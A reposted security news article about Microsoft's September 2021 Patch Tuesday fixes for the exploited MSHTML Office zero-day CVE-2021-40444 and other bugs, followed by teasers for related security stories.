[TheRecord] Microsoft patches Office zero-day in today’s Patch Tuesday

Microsoft has released patches today for a zero-day vulnerability in one of the Windows components that was abused in the wild for attacks using weaponized Office documents.

First disclosed last week, when Microsoft warned of the attacks and published basic mitigations, the OS maker has released official fixes as today, part of its monthly Patch Tuesday security updates.

Tracked as CVE-2021-40444, patches have been made available for Windows versions as far back as Windows 7 and Windows Server 2008.

The bug resides in the Microsoft MHTML component, also known as Trident, the old Internet Explorer browser engine. Microsoft said it discovered instances where a threat actor had created malicious Office files that used the MHTML component to load web-based content inside the documents, such as a malicious ActiveX control, which exploited CVE-2021-40444 to run code on the underlying Windows OS.

A successful attack allowed threat actors to gain control over a user’s OS, Microsoft said last week.

While no technical details were revealed last week, security researchers and malware developers quickly figured out what the issue was and published proof-of-concept code to exploit the bug was eventually on both GitHub and underground hacking forums, and the code has already been weaponized and integrated as part of attacks spotted this week.

A campaign with it today targeting Russian telcos…

— alex lanstein (@alex_lanstein) September 13, 2021

Fortunately, today’s Office zero-day patch also comes just in time, as several security researchers discovered last week ways to bypass Microsoft’s temporary mitigation solutions [12], meaning that Windows users were fully exposed to these attacks without any kind of protection.

However, if the patches hold up remains to be seen. Several security researchers have publicly stated that the bug is buried deep enough in core Office behavior that attackers could easily find new ways to abuse this issue, creating another scenario similar to Microsoft’s PrintNightmare never-ending patching conundrum.

The September 2021 Patch Tuesday also fixes 85 other bugs

But besides fixes for CVE-2021, Microsoft has also released other security updates today, with patches for 85 other bugs, 48 of which are Edge/Chromium-related issues.

Of these, the most important appears to be CVE-2021-36968, an elevation of privilege in the Windows DNS service, for which details have been publicly shared on the internet.

“According to Microsoft, it is not being exploited in the wild,” said Allan Liska, threat intelligence analyst at Recorded Future. “It is labelled Important by Microsoft and, interestingly, only impacts Windows 7 and Windows Server 2008.”

Other issues to keep an eye on, and reasons to apply today’s patches as soon as possible, are CVE-2021-36965 and CVE-2021-26435, Liska said.

The post Microsoft patches Office zero-day in today’s Patch Tuesday appeared first on The Record by Recorded Future.

Source: Read More (The Record by Recorded Future)

You might be interested in …

[ThreatPost] Peloton Bike+ Bug Gives Hackers Complete Control

All posts, ThreatPost

An attacker with initial physical access (say, at a gym) could gain root entry to the interactive tablet, making for a bevy of remote attack scenarios. Source: Read More (Threatpost)

Read More

[BleepingComputer] Attackers scan for unpatched VMware vCenter servers, PoC exploit available

Threat actors are actively scanning for Internet-exposed VMware vCenter servers unpatched against a critical remote code execution (RCE) vulnerability impacting all vCenter deployments and patched by VMware ten days ago. […] Source: Read More (BleepingComputer)

Read More

[HackerNews] Mozi IoT Botnet Now Also Targets Netgear, Huawei, and ZTE Network Gateways

All posts, HackerNews

Mozi, a peer-to-peer (P2P) botnet known to target IoT devices, has gained new capabilities that allow it to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE, according to new findings. “Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks,” researchers at […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.